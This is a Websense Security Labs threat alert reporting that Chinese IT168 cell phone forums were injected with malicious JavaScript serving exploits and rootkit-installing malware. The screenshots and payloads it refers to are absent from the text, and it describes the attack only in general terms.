Security Labs


  digg   |   |     reddit
  newsvine   |     furl   |     technorati

The Cell Phone Forums of Injection


Threat Type: Malicious Web Site / Malicious Code

Websense® Security Labs™ ThreatSeeker™ Network has discovered that some well-known cell phone forums at IT168 in China have been injected with malicious JavaScript. The infected forum sites - including forums for Nokia, Motorola, and Sony Ericsson - are serving some exploits that target a number of vulnerabilities in the wild. is one of the largest mainstream IT information platforms in China, providing IT product price and market orientation information. It has a high Alexa rank of 170. The forums on the site, especially the cell phone bulletin boards, are very popular, and unsuspecting visitors to these sites can easily get infected.

Screenshot of

Screenshot of the injected JavaScript:

The payload of the JavaScript:

The attackers capitalize on the results from popular search engines like Google, Baidu, and Sogou to spread malicous codes.

The payload of the iframe above:

The targeting vulnerabilities are:


Once one of the vulnerabilities is triggered, an executable is downloaded onto the user's machine. This malware installs a rootkit driver and also downloads the main "threat dispatcher". At least 29 malicious applications are downloaded. Some of them install global hooks on the machine, copy themselves inside the Windows folder, and perform other malicious activities. The majority of these executables are packed with UPX, but a few of them use custom executable packers.

Websense Messaging and Websense Web Security customers are protected against this attack.